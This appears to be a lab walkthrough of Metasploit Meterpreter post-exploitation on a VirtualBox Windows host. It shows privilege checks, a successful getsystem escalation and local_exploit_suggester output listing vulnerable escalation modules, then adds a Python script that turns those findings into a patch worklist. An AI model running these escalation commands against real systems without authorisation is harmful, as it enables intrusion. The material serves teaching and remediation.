Checking privileges with win_privs
post/windows/gather/win_privs
meterpreter > run post/windows/gather/win_privs
Current User
Is Admin  Is System  Is In Local Admin Group  UAC Enabled  Foreground ID  UID
--------  ---------  -----------------------  -----------  -------------  ---
False     False      True                     False        1              "HAHWUL\Test-Virtualbox"
Windows Privileges
Name
----
SeChangeNotifyPrivilege
Automatic privilege escalation with getsystem
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Named Pipe Impersonation (In Memory/Admin)
2 : Named Pipe Impersonation (Dropper/Admin)
3 : Token Duplication (In Memory/Admin)
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
Finding local exploits with local_exploit_suggester
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.56.101 - Collecting local exploits for x86/windows…
[*] 192.168.56.101 - 37 exploit checks are being tried…
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
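
The suggester output above can also be read as a patch worklist for the host's administrator. The following is an added example, not part of the original post or of Metasploit: the function names and the "likely"/"unverified" labels are assumptions, and the sample lines are copied from the run above.

```python
import re
from collections import defaultdict

# Lines copied from the local_exploit_suggester run shown above.
SAMPLE = """\
[*] 192.168.56.101 - 37 exploit checks are being tried…
[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
"""

# "[+] <host> - <module path>: <check result message>"
FINDING = re.compile(r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>exploit/[^\s:]+):\s+(?P<msg>.+)$")
# Bulletin number embedded in the module name, e.g. ms10_092 -> MS10-092.
BULLETIN = re.compile(r"/ms(\d{2})_(\d{3})_")
RANK = {"likely": 0, "unverified": 1, "other": 2}

def parse_findings(text):
    """Return one dict per [+] line: host, module, bulletin, confidence."""
    findings = []
    for line in text.splitlines():
        m = FINDING.match(line.strip())
        if not m:
            continue  # [*] status lines and anything else are not findings
        msg = m.group("msg")
        confidence = "other"
        if "appears to be vulnerable" in msg:
            confidence = "likely"
        elif "could not be validated" in msg:
            confidence = "unverified"
        b = BULLETIN.search(m.group("module"))
        findings.append({
            "host": m.group("host"),
            "module": m.group("module"),
            "bulletin": f"MS{b.group(1)}-{b.group(2)}" if b else None,
            "confidence": confidence,
        })
    return findings

def patch_worklist(findings):
    """Per host: (confidence, bulletin-or-module) pairs, likely ones first."""
    work = defaultdict(set)
    for f in findings:
        work[f["host"]].add((f["confidence"], f["bulletin"] or f["module"]))
    return {h: sorted(items, key=lambda i: (RANK[i[0]], i[1])) for h, items in work.items()}

if __name__ == "__main__":
    print(patch_worklist(parse_findings(SAMPLE)))
```

Modules whose names carry no bulletin number (ppr_flatten_rec here) are listed by module path so the matching update can be looked up by hand.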